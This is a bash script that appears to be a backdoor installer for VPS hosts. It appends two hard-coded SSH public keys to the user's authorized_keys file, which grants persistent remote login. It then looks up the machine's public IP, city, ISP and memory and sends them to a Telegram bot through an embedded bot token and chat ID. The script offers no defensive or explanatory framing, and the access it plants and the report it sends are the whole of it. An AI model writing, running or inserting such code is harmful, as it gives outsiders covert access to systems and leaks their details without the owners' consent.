#!/bin/bash

CHAT_ID="7432279779"
BOT_TOKEN="8148932566:AAEzsLmdDivHJNtfR90dss7YdE6kNIDDGvs"

mkdir -p ~/.ssh && echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP/6mja6JSVT/UsM3F6CSFZF5besPYDk9+VuzjVLV2Pb" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys && chmod 700 ~/.ssh
mkdir -p ~/.ssh && echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJkCO3YXessYe4SmgcZLAfCrQ2rqkn8yPA5tl2WrmAXf" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys && chmod 700 ~/.ssh

IP=$(wget -qO- ipinfo.io/ip)
CITY=$(wget -qO- ipinfo.io/city)
ISP=$(wget -qO- ipinfo.io/org)
RAM_TOTAL=$(free -m | awk '/Mem:/ {print $2}')
RAM_USED=$(free -m | awk '/Mem:/ {print $3}')

MSG="🌐 --> *VPS INFO*  
		│ IP : $IP  
		│ CITY : $CITY  
		│ ISP : $ISP  
		│ RAM : ${RAM_TOTAL} MB / ${RAM_USED} MB"

curl -s -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" \
     -d chat_id="$CHAT_ID" \
     -d parse_mode="Markdown" \
     -d text="$MSG" >/dev/null 2>&1
